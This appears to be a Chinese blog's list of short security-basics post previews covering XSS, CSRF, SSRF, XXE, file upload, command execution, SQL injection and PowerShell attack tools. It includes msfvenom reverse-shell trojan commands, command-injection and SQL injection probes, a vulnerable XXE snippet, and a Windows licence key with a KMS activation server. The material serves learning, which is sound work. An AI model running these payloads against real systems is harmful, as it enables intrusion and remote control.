安全基础知识
Cmbt008
这个作者很懒,什么都没留下…
展开
-
XSS漏洞
XSS跨站脚本注入。允许恶意用户将代码注入网页。1.反射型:一次性。攻击者通过电子邮件等方式将包含XSS代码的恶意链接发送给目标用户。当用户访问该链接时,服务器接收该目标该用户的请求进行处理,然后服务器把带有XSS代码的数据发送给目标用户的浏览器,浏览器解析这段XSS代码后,触发XSS。2.存储型持久型XSS,攻击脚本将永久存放在目标服务器的数据库或文件中,焗油很高的隐蔽性。通常在论坛、博客、留言板。3.DOM型DOM可以使程序和脚本能够动态访问和更新文档内容、结构及样式。DOM型XS原创 2021-03-08 15:36:21 · 161 阅读 · 1 评论 -
CSRF漏洞
CSRF:跨站伪造请求:攻击者利用目标用户的身份,以目标用户的名义执行某些非法操作。以目标用户的名义发送邮件、发消息,盗取目标用户的账号等。修复建议:1.验证请求的referer值,referer是一自己网站开头的域名,说明该请求安全,referer是其他网站或者空白,则很有可能是攻击。2.在请求中放入不能伪造的信息。如在http请求中以参数的形式加入一个随机产生的token,并在服务器端验证token。...原创 2021-03-08 15:35:36 · 162 阅读 · 0 评论 -
SSRF漏洞
SSRF:服务器端请求伪造,攻击者构造请求,由服务端发起请求。一般都是外网无法访问内部系统,由内网向外网发送请求。SSRF的形成大多是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址过滤于限制。主要攻击方式:1.对外网,服务器所在内网、本地进行端口扫描,获取一些服务的banner信息。2.攻击运行在内网或本地的应用程序。3.对内网web应用进行指纹识别,识别企业内部的资产信息。4.攻击内外网的web应用,主要使用http GET请求就可以实现的攻击,如SQLi,struts25.利原创 2021-03-08 15:34:55 · 171 阅读 · 0 评论 -
XXE漏洞
XML外部实体注入,XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。代码漏洞分析:<?php$xmlfile = file_get_contents('php://input');$dom = new DOMDocument();$dom -> loadXML($xmlfile);$xml = simplexml_import_dom($dom);$xxe = $xml ->xxe;$str =原创 2021-03-08 15:34:25 · 183 阅读 · 0 评论 -
文件上传漏洞
服务器端没有对客户端上传的文件进行严格的验证和过滤,造成上传任意文件的情况,例如asp、aspx、php、jsp等脚本文件。 webshell修复建议:白名单判断文件后缀是否合法对上传后的文件进行重命名...原创 2021-03-08 15:33:51 · 82 阅读 · 0 评论 -
暴力破解漏洞
账户的用户名和密码被暴力破解。修复建议:设置账户登录次数阈值,所得IP如果某个IP登录次数超过设置的阈值,则锁定IP原创 2021-03-08 15:33:18 · 151 阅读 · 0 评论 -
命令执行漏洞
应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数可以执行系统命令。hacker控制这些函数的参数时,将恶意的系统命令拼接到正常命令中,造成命令执行攻击。如:x.php?ip=127.0.0.1 | dirWindows支持的管道符:| :直接执行后面的语句。 ping 127.0.0.1 | whoami|| :前面语句执行出错。则执行后面的语句,前面语句只能为假。 ping 2 |原创 2021-03-08 15:32:48 · 308 阅读 · 0 评论 -
逻辑漏洞
逻辑漏洞是指攻击者利用业务设计缺陷,获取敏感信息或破坏业务的完整性。一般出现在修改密码、越权访问、密码找回、交易支付金额等功能处。越权访问有水平越权和垂直越权。水平越权:相同级别(权限)的用户或者同一角色中不同的用户之间,可以越权访问、修改或删除其他用户信息的非法操作。垂直越权:不同级别之间的用户或不同角色之间用户的越权。修复建议:越权访问主要原因是没有对用户的身份做判断和控制,可以通过session来控制。...原创 2021-03-08 15:31:55 · 111 阅读 · 0 评论 -
powershell常用工具
powershell常用工具:1.PowerSploit:常用于信息探测、特权提升、凭证窃取、持久化2.NiShang:集成了框架、脚本和各种payload,包含下载和执行、键盘记录、DNS、延时命令3.Empire:常用于提供前期漏洞利用的集成模块、信息探测、凭据窃取、持久化控制4.PowerCat:通过与其他工具结合和重定向,可以在脚本中以多中方式使用。...原创 2021-03-08 15:31:18 · 499 阅读 · 0 评论 -
域环境搭建
winserver2008为域控,域中有win7、win10、Linux。域名为haocker.com:(最好是静态IP)winserver2008R2 DATAcenter激活 :打开cmd注意右键以管理员身份运行,依次输入:slmgr /ipk 74YFP-3QFB3-KQT8W-PMXWJ-7M648slmgr /skms zh.us.to( 设置kms服务器)slmgr /ato( 激活server2008)slmgr /xpr (查询激活期限)1.服务器安装AD域服务2.添加域原创 2021-03-04 17:21:25 · 160 阅读 · 1 评论 -
msfvenom生成木马大全
msfvenom生成木马Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elfWindows msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exeMac m原创 2021-03-04 17:16:07 · 732 阅读 · 2 评论 -
常见SQL注入总结
没有对用户输入数据的合法性没有判断。id = 1 / id = 1’ /id = 1 and 1=1 /id = 1 and 1=2MySQL5.0后默认有information_schema数据库,表schemata、tables、columnsdatabase()、version()、user()函数limit m,n m记录开始的位置,n取的条数mysql注释符: # – /**/内联注释 /!code/?id=-1 /!union/ /!select/原创 2021-03-04 17:14:30 · 273 阅读 · 1 评论